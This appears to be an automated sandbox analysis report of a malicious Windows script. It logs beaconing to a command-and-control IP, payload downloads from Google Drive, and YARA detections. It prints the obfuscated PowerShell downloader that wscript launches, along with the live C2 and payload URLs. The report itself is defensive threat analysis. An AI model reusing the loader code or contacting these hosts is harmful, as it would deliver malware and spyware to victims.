Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: unknown HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 180Connection: close
Source: dxdiag.exe, dxdiag.exe, 00000012.00000003.2523458523.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://137.184.191.215/index.php/check.php?id=1
Source: powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2211216350.000002B428E2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2211216350.000002B427071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3013276125.0000000004B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2211216350.000002B427071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.3013276125.0000000004B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBsq
Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2211216350.000002B428D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.2211216350.000002B427297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/-
Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3286061335.0000000006180000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I
Source: powershell.exe, 00000002.00000002.2211216350.000002B427297000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8P
Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8XR
Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh8
Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427505000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: dxdiag.exe, dxdiag.exe, 00000012.00000003.2523490234.0000000005F9D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2459489628.0000000005F9D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2459437875.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2523458523.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download
Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=downloadM
Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427505000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download
Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2211216350.000002B427C51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005F36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wordpress.org/documentation/article/faq-troubleshooting/
Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49714 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_6412.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3032, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848CEB276 2_2_00007FF848CEB276
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848CEC022 2_2_00007FF848CEC022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848DB994A 2_2_00007FF848DB994A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_049DF320 4_2_049DF320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_049DFBF0 4_2_049DFBF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_049DEFD8 4_2_049DEFD8
Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 18_3_05F6ED99 18_3_05F6ED99
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7271
Source: unknown Process created: Commandline size = 7271
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7271 Jump to behavior
Yara signature match
Source: amsi32_6412.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3032, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBE@30/10@2/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Drgs.Trs Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpbhzuw5.bia.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3032
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6412
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
